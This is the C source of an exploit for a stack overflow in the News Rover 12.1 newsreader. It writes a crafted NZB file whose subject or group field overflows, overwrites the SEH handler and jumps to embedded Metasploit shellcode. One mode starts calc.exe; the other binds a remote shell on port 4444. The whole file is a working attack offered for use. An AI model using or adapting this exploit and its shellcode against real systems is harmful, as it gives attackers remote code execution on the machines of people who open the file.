|
/*********************************************************************************************\
* *
* News Rover 12.1 Rev 1 Remote Stack Overflow exploit *
* Coded and discovered by Marsu <MarsupilamiPowa@hotmail.fr> *
* *
* Note: thx aux Bananas et a la KryptonIT.
Bon courage aux inuITs :P *
\*********************************************************************************************/
#include "stdlib.h"
#include "stdio.h"
#include "string.h"
/* win32_exec - EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com */
/* BAD CHARS ARE 0x00 0x3c 0x3d 0x3e 0x3f 0x0a 0x0d 0x22 0x25 0x26 0xA7 0x8a.
Maybe more.. */
char calcshellcode[] =
"\x2b\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xa4"
"\xb2\x82\x70\x83\xeb\xfc\xe2\xf4\x58\x5a\xc6\x70\xa4\xb2\x09\x35"
"\x98\x39\xfe\x75\xdc\xb3\x6d\xfb\xeb\xaa\x09\x2f\x84\xb3\x69\x39"
"\x2f\x86\x09\x71\x4a\x83\x42\xe9\x08\x36\x42\x04\xa3\x73\x48\x7d"
"\xa5\x70\x69\x84\x9f\xe6\xa6\x74\xd1\x57\x09\x2f\x80\xb3\x69\x16"
"\x2f\xbe\xc9\xfb\xfb\xae\x83\x9b\x2f\xae\x09\x71\x4f\x3b\xde\x54"
"\xa0\x71\xb3\xb0\xc0\x39\xc2\x40\x21\x72\xfa\x7c\x2f\xf2\x8e\xfb"
"\xd4\xae\x2f\xfb\xcc\xba\x69\x79\x2f\x32\x32\x70\xa4\xb2\x09\x18"
"\x98\xed\xb3\x86\xc4\xe4\x0b\x88\x27\x72\xf9\x20\xcc\x42\x08\x74"
"\xfb\xda\x1a\x8e\x2e\xbc\xd5\x8f\x43\xd1\xe3\x1c\xc7\x9c\xe7\x08"
"\xc1\xb2\x82\x70";
/* win32_bind - EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com */
char bindshellcode[] =
"\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xf7"
"\x82\xf8\x80\x83\xeb\xfc\xe2\xf4\x0b\xe8\x13\xcd\x1f\x7b\x07\x7f"
"\x08\xe2\x73\xec\xd3\xa6\x73\xc5\xcb\x09\x84\x85\x8f\x83\x17\x0b"
"\xb8\x9a\x73\xdf\xd7\x83\x13\xc9\x7c\xb6\x73\x81\x19\xb3\x38\x19"
"\x5b\x06\x38\xf4\xf0\x43\x32\x8d\xf6\x40\x13\x74\xcc\xd6\xdc\xa8"
"\x82\x67\x73\xdf\xd3\x83\x13\xe6\x7c\x8e\xb3\x0b\xa8\x9e\xf9\x6b"
"\xf4\xae\x73\x09\x9b\xa6\xe4\xe1\x34\xb3\x23\xe4\x7c\xc1\xc8\x0b"
"\xb7\x8e\x73\xf0\xeb\x2f\x73\xc0\xff\xdc\x90\x0e\xb9\x8c\x14\xd0"
"\x08\x54\x9e\xd3\x91\xea\xcb\xb2\x9f\xf5\x8b\xb2\xa8\xd6\x07\x50"
"\x9f\x49\x15\x7c\xcc\xd2\x07\x56\xa8\x0b\x1d\xe6\x76\x6f\xf0\x82"
"\xa2\xe8\xfa\x7f\x27\xea\x21\x89\x02\x2f\xaf\x7f\x21\xd1\xab\xd3"
"\xa4\xd1\xbb\xd3\xb4\xd1\x07\x50\x91\xea\xe9\xdc\x91\xd1\x71\x61"
"\x62\xea\x5c\x9a\x87\x45\xaf\x7f\x21\xe8\xe8\xd1\xa2\x7d\x28\xe8"
"\x53\x2f\xd6\x69\xa0\x7d\x2e\xd3\xa2\x7d\x28\xe8\x12\xcb\x7e\xc9"
"\xa0\x7d\x2e\xd0\xa3\xd6\xad\x7f\x27\x11\x90\x67\x8e\x44\x81\xd7"
"\x08\x54\xad\x7f\x27\xe4\x92\xe4\x91\xea\x9b\xed\x7e\x67\x92\xd0"
"\xae\xab\x34\x09\x10\xe8\xbc\x09\x15\xb3\x38\x73\x5d\x7c\xba\xad"
"\x09\xc0\xd4\x13\x7a\xf8\xc0\x2b\x5c\x29\x90\xf2\x09\x31\xee\x7f"
"\x82\xc6\x07\x56\xac\xd5\xaa\xd1\xa6\xd3\x92\x81\xa6\xd3\xad\xd1"
"\x08\x52\x90\x2d\x2e\x87\x36\xd3\x08\x54\x92\x7f\x08\xb5\x07\x50"
"\x7c\xd5\x04\x03\x33\xe6\x07\x56\xa5\x7d\x28\xe8\x07\x08\xfc\xdf"
"\xa4\x7d\x2e\x7f\x27\x82\xf8\x80";
char nzbheader[]="<?xml version=\"1.0\" encoding=\"iso-8859-1\" ?>\n"
"<!DOCTYPE nzb PUBLIC \"-//newzBin//DTD NZB 1.0//EN\" \"http://www.newzbin.com/DTD/nzb/nzb-1.0.dtd\">\n"
"<!-- NZB Generated by MarsupilamiPowa -->\n"
"<nzb xmlns=\"http://www.google.com\">\n\n";
char nzbend[]="</segment>\n"
"</segments>\n"
"</file>\n"
"</nzb>\n";
char defaultfilename[]="file.nzb";
int main(int argc, char* argv[]) {
FILE *file;
char * pad;
int type=0;
int mode=0;
char *filename;
char *myshell;
printf("[+] NZB exploit for News Rover\n");
printf("[+] Coded and discovered by Marsu <Marsupilamipowa@hotmail.fr>\n");
if (argc>3) {
type=atoi(argv[1]);
filename=argv[3];
mode=atoi(argv[2]);
if (!mode)
myshell=calcshellcode;
else
myshell=bindshellcode;
}
else {
printf("[+] Usage: %s type mode file.nzb\n\n",argv[0]);
printf("[+] type is ...\n");
printf("0: News Rover v12.1, Rev.
1 Subject stack overflow. Works on XP SP2 FR\n");
printf("1: News Rover v12.1, Rev.
1 Group stack overflow. Works on XP SP2 FR\n\n");
printf("[+] mode is \n");
printf("0: Spawns calc.exe\n");
printf("1: Binds to 4444\n\n");
printf("[+] Ex: %s 0 0 file.nzb",argv[0]);
return 0;
}
file=fopen(filename,"wb");
if (type==0)
{
fprintf(file,nzbheader);
fprintf(file,"<file poster=\"Poster\" date=\"1170609233\"\nsubject=\"");
pad = (char*)malloc(sizeof(char)*3000+strlen(myshell));
memset(pad,'A',3000);
memcpy(pad+2022,"\xeb\x15\x90\x90",4); //jmp short +15
memcpy(pad+2026,"\x2a\x02\xfc\x7f",4); //pop pop ret in ??? defeats SP2 SEH call protection.
Have a look to your memory and change this address if it doesnt work.
memset(pad+2030,0x90,15); //nop padding
memcpy(pad+2045,myshell,strlen(myshell));
memset(pad+2045+strlen(myshell),0,1);
memset(pad+3000,0,1);
fprintf(file,pad);
fprintf(file,"\">\n<groups><group>some group</group></groups>\n<segments>\n<segment bytes=\"30\" number=\"1\">some name");
fprintf(file,nzbend);
fclose(file);
}
else if (type==1)
{
fprintf(file,nzbheader);
fprintf(file,"<file poster=\"Poster\" date=\"1170609233\" subject=\"Some Subj\">\n");
fprintf(file,"<groups><group>alt.bdffs</group></groups>\n<segments>\n<segment bytes=\"30\" number=\"1\">no matter the name</segment>\n</segments>\n</file>");
fprintf(file,"\n\n<file poster=\"Poster\" date=\"1170609233\" subject=\"Some Subj\">\n");
fprintf(file,"<groups><group>");
pad = (char*)malloc(sizeof(char)*100);
memset(pad,'A',100);
memcpy(pad,"\x90\xb8\x33\x33\x33\x33\x2D\x13\x27\x33\x33\x8B\x04\x04\x40\xFF\xD0",17); //We will use data stuck in Segment to exec our code because we dont have much place here
memcpy(pad+94,"\x53\xF1\xD1\x77\00",5); //call ebx in USER32.dll
fprintf(file,pad);
fprintf(file,"</group></groups>\n<segments>\n<segment bytes=\"30\" number=\"1\">");
pad=(char *)realloc(pad,sizeof(char)*3000);
memset(pad,'A',3000);
memcpy(pad+1500,myshell,strlen(myshell));
memset(pad+3000,0,1);
fprintf(file,pad);
fprintf(file,nzbend);
fclose(file);
}
printf("[+] File generated! Have fun\n");
return 0;
}
.
|
